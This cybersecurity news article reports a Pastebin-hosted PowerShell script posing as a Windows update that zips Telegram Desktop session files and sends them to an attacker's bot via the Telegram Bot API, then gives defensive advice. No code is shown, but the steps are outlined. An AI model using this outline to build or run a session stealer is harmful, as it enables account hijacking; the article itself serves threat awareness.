Hackers Exploit Pastebin-Hosted PowerShell Script to Hijack Telegram Sessions
Cybersecurity researchers have recently identified a malicious PowerShell script hosted on Pastebin, specifically engineered to clandestinely extract Telegram session data from both desktop and web clients. Masquerading as a routine Windows system update, this script deceives users into executing it, thereby compromising their Telegram accounts without immediate detection.
Deceptive Disguise and Execution
The script is labeled Windows Telemetry Update, a title deliberately chosen to resemble legitimate Windows maintenance tasks. Upon execution, it initiates a sequence of operations designed to gather and exfiltrate sensitive information. Initially, the script collects host metadata, including the victim’s username, computer name, and public IP address obtained via api.ipify[.]org. Subsequently, it targets directories associated with Telegram installations, specifically %APPDATA%\Telegram Desktop and %APPDATA%\Telegram Desktop Beta. Within these directories, the script locates session files and compiles them into a compressed archive named diag.zip, which is temporarily stored in the user’s TEMP folder.
Discovery and Analysis
Flare analysts uncovered this Pastebin-hosted script during routine monitoring of paste sites and illicit channels for malicious content. Their investigation revealed a purpose-built Telegram session stealer that not only targets desktop session data but also exfiltrates it through the Telegram Bot API. Notably, the script shares infrastructure with a separate web-based session capture tool, indicating a coordinated effort to compromise Telegram accounts across different platforms.
The script was found in two versions on Pastebin, both posted under the same account. The initial version (v1) contained a flawed multipart upload implementation, preventing the diag.zip archive from reaching the bot. Recognizing this failure, the operator revised the script and published a corrected version (v2) that properly implements the sendDocument endpoint using the Invoke-RestMethod-Form approach with correct multipart/form-data encoding. This debugging process, visible in the public Pastebin post history, offers a rare insight into the development and testing phases of session-stealing tools before their operational deployment.
Operational Status and Potential Threat
Neither version of the script includes obfuscation, persistence mechanisms, or automated delivery or execution methods. Based on Flare’s analysis, the script appeared to be in active validation at the time of discovery rather than deployed in a live campaign. However, the functional v2 variant and the confirmed web-based session stealer sharing the same bot infrastructure suggest that the capability has passed functional validation and could move toward scaled operation.
Mechanism of Telegram Session Theft
The infection chain begins when a victim manually runs the PowerShell file. The script simultaneously initiates two investigative paths: it queries the Telegram Bot API directly to enumerate the bot and retrieves existing bot telemetry from the bot’s message history using the Matka tool.
After collecting host metadata, the script checks for both stable and beta installations of Telegram Desktop under %APPDATA%. If it identifies any matching paths, it proceeds to archive the session files; otherwise, it triggers a No Telegram installation found beacon, ensuring the operator is notified of every execution, regardless of the outcome.
Implications and Recommendations
This discovery underscores the evolving tactics of cybercriminals who exploit trusted platforms like Pastebin to host and disseminate malicious scripts. By disguising malware as legitimate system updates, attackers increase the likelihood of user execution, thereby facilitating unauthorized access to sensitive information.
To mitigate such threats, users are advised to:
– Exercise Caution with Unsolicited Updates: Be wary of unexpected system update prompts, especially those delivered via email or third-party websites.
– Verify Update Sources: Always download updates directly from official vendor websites or through trusted update mechanisms.
– Implement Robust Security Measures: Utilize comprehensive security solutions that can detect and block malicious scripts and unauthorized data exfiltration attempts.
– Regularly Monitor Account Activity: Keep an eye on account activities for any unauthorized access or anomalies, particularly in communication applications like Telegram.
By adopting these practices, individuals and organizations can enhance their defenses against sophisticated cyber threats that exploit trusted platforms and social engineering tactics.
